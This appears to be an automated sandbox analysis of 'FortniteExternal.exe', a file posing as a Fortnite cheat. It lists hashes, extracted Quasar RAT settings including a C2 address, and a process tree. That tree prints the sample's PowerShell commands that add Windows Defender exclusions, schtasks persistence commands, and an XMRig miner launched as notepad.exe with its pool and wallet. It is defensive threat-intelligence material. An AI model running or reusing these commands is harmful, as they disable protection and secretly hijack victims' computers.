Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 18:49

General

  • Target

    FortniteExternal.exe

  • Size

    39KB

  • MD5

    cffb27bf1ba05391482df627dc8504e4

  • SHA1

    c7deb87c21a1bb2b97e3ded00edf56578acf3aac

  • SHA256

    a9a90a7ba273affb69647f2eabb614e4dcd2c6acbb82c2b1bb3cb4b936e5fffe

  • SHA512

    9132d00fadc97bca3a6246f86bfc745d18227928ecd8a66e2495e788ce628df41b3eaf5270a25f2c7818aef41765a18a3ecb09c2aed3ac47d9d02894098ac1ee

  • SSDEEP

    768:xldEjfYrbTQA+mzUMDmNwS9yVSErxnXneI6zDf9BQj0/nyc3v:xld8mzJmPqSExgzDft/nFv

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Runtime Broker

C2

92.221.125.55:49868

Mutex

73f0bf3a-83f3-424b-b7a1-a8200df3e317

Attributes
  • encryption_key

    5CB2755608EFDB1313EF4F2ACEA101833F5AEE2B

  • install_name

    Runtime Broker.exe

  • log_directory

    Logs

  • reconnect_delay

    100

  • startup_key

    System

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 13 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe
    "C:\Users\Admin\AppData\Local\Temp\FortniteExternal.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\cm2.exe
      "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\cm2.exe"
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2896
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1600
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2040
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Windows\system32\services64.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1732
          • C:\Windows\system32\services64.exe
            C:\Windows\system32\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2988
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
              6⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:936
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3036
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:820
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2256
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:264
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                    PID:2728
                • C:\Windows\System32\notepad.exe
                  C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10343 --user=88SnrVgESxo4oqDueYzTEcYaJJR5sQpBAJwk5bMuskEg9jWfT5X5eYvhdPu8vWPBV1Tqbx31GitQURNLmvKkBtH5QsY6dN3 --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1480
      • C:\Users\Admin\AppData\Local\Temp\qcmq3.exe
        "C:\Users\Admin\AppData\Local\Temp\qcmq3.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:620
        • C:\Windows\system32\schtasks.exe
          "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2904
        • C:\Windows\system32\SubDir\Runtime Broker.exe
          "C:\Windows\system32\SubDir\Runtime Broker.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "System" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Runtime Broker.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1704
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:2252
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:864
          • C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe
            "C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1504
            • C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe
              "C:\Users\Admin\AppData\Local\Temp\SW-Spoofer1.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1776
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c cls
            2⤵
              PID:1956

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-processthreads-l1-1-1.dll

            Filesize

            21KB

            MD5

            517eb9e2cb671ae49f99173d7f7ce43f

            SHA1

            4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

            SHA256

            57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

            SHA512

            492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

          • C:\Users\Admin\AppData\Local\Temp\_MEI15042\python313.dll

            Filesize

            1.8MB

            MD5

            1490ed147cdd2c2fb09259d2b6c42161

            SHA1

            11c639b79b11d6c6d2a5910e602b199e8c63fffe

            SHA256

            c47c6432c0c202e885b344a18dcb4e392999c9a78eb987720b48e0fcff2e6a61

            SHA512

            1f086ab3e2029ad450a9be92d3e367342b6eed52e7581647e7b88596a1cbee1d9b478c41ce956396e4056974f1f3fe148192828bad3613ab58ed2c3e758b8a03

          • C:\Users\Admin\AppData\Local\Temp\_MEI15042\ucrtbase.dll

            Filesize

            992KB

            MD5

            0e0bac3d1dcc1833eae4e3e4cf83c4ef

            SHA1

            4189f4459c54e69c6d3155a82524bda7549a75a6

            SHA256

            8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

            SHA512

            a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

          • C:\Users\Admin\AppData\Local\Temp\cm2.exe

            Filesize

            2.1MB

            MD5

            a954a23215467586a71022e732b23a8d

            SHA1

            c089a6662e8f7bac5ec791b80ec81b77e20bdff4

            SHA256

            007e711c06244bbbbf534b878d665ee0f17abbac80c7d4fb794f357684151751

            SHA512

            e44f9f8aebebbb7a5559b67fe6824cc5637a8961aae2e929bdabfc0720b2b10ae70d7bcb9c132f1a3d6532848184bb3b9ec4f59a11d523dd215173df676860b9

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            2b3b759e966808098067552e23bdcd85

            SHA1

            4512bc212d585bd8bdabd097b9c6c3e2cb1c18fc

            SHA256

            566f153af491adc56c2f55aca4d733ff07485f027a1827e2cf2a2c10d0b29fb8

            SHA512

            c683e3d81db93e946aeb27048ec8a618336ae679d19c5c7d144ef5de0fcecbc33af29156233739f42c9162a992a912a84fa6100d8cd624630aff48489cc4b1dc

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            5c482ddbf0a56e908f9790e357b094ce

            SHA1

            3c62b1bfc7bbef54d96052807e579f5ac9f0c7b8

            SHA256

            057112dbbd514da8aba8e33721d6cd27ad0e2d5ba15a0970b20961cb0db1423f

            SHA512

            fe11b5ef292fb1a3566501a1ce9b5e146dde0b7f3efa9918a2cc7f807fa496778c14ab4dc560b0e5a60f812565436287c06065349e6946a67061f1ca017a6d35

          • C:\Windows\System32\FortniteExternal.exe

            Filesize

            3.1MB

            MD5

            52025b6114feff994df431c8a0a5c9ae

            SHA1

            4b0e9178616c83f68f45775eaacace6027dd42c2

            SHA256

            8c5c09639035ecd95ba08dd6aae713443b3f45614e1fde653b2d6f45156b4e7b

            SHA512

            03ee1109f2d0e79620f7f9fee61411762842cc77ccbc1bc25e98c97278e4ee7745d5e3d46d165761ba5134e228e45c270b1d05cdbda6fef51a3409b8e9cdb73f

          • C:\Windows\System32\Microsoft\Libs\sihost64.exe

            Filesize

            32KB

            MD5

            76dd3f5cec238575932dfbe21ff77b71

            SHA1

            100b90b4c2880405683177513f5ef170257af160

            SHA256

            1e5758dc2cf566629840cf437aadc72f4d5850bea3017f0751c30294989ea348

            SHA512

            0c7d15ff6afe065fec4a20072f909663e2e048582ddfe34d15901cd7e16c4a8ac7911791191d01d5be496b6d1fb4b9492ecc8e271c28ffc263a2cdb4faa7e5d6

          • \Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-file-l1-2-0.dll

            Filesize

            21KB

            MD5

            1c58526d681efe507deb8f1935c75487

            SHA1

            0e6d328faf3563f2aae029bc5f2272fb7a742672

            SHA256

            ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

            SHA512

            8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

          • \Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-file-l2-1-0.dll

            Filesize

            18KB

            MD5

            bfffa7117fd9b1622c66d949bac3f1d7

            SHA1

            402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

            SHA256

            1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

            SHA512

            b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

          • \Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-localization-l1-2-0.dll

            Filesize

            21KB

            MD5

            724223109e49cb01d61d63a8be926b8f

            SHA1

            072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

            SHA256

            4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

            SHA512

            19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

          • \Users\Admin\AppData\Local\Temp\_MEI15042\api-ms-win-core-timezone-l1-1-0.dll

            Filesize

            21KB

            MD5

            d12403ee11359259ba2b0706e5e5111c

            SHA1

            03cc7827a30fd1dee38665c0cc993b4b533ac138

            SHA256

            f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

            SHA512

            9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

          • memory/620-48-0x00000000009F0000-0x0000000000D14000-memory.dmp

            Filesize

            3.1MB

          • memory/1480-91-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-109-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-121-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-112-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-89-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-93-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-97-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-87-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-95-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-103-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-120-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-119-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-118-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-117-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-105-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-116-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-111-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

            Filesize

            4KB

          • memory/1480-113-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-114-0x00000000000F0000-0x0000000000110000-memory.dmp

            Filesize

            128KB

          • memory/1480-99-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-107-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1480-101-0x0000000140000000-0x0000000140786000-memory.dmp

            Filesize

            7.5MB

          • memory/1600-57-0x0000000001D90000-0x0000000001D98000-memory.dmp

            Filesize

            32KB

          • memory/1600-56-0x000000001B630000-0x000000001B912000-memory.dmp

            Filesize

            2.9MB

          • memory/1776-940-0x000007FEEB350000-0x000007FEEB9B5000-memory.dmp

            Filesize

            6.4MB

          • memory/1824-63-0x0000000000220000-0x0000000000544000-memory.dmp

            Filesize

            3.1MB

          • memory/2728-148-0x0000000000250000-0x0000000000256000-memory.dmp

            Filesize

            24KB

          • memory/2728-147-0x0000000000060000-0x0000000000066000-memory.dmp

            Filesize

            24KB

          • memory/2760-66-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2760-65-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

            Filesize

            4KB

          • memory/2760-35-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2760-32-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2760-33-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2760-26-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2760-25-0x000000001B840000-0x000000001BA60000-memory.dmp

            Filesize

            2.1MB

          • memory/2760-24-0x000007FEF5E93000-0x000007FEF5E94000-memory.dmp

            Filesize

            4KB

          • memory/2760-23-0x00000000001D0000-0x00000000003F1000-memory.dmp

            Filesize

            2.1MB

          • memory/2760-73-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

            Filesize

            9.9MB

          • memory/2896-50-0x00000000027E0000-0x00000000027E8000-memory.dmp

            Filesize

            32KB

          • memory/2896-49-0x000000001B700000-0x000000001B9E2000-memory.dmp

            Filesize

            2.9MB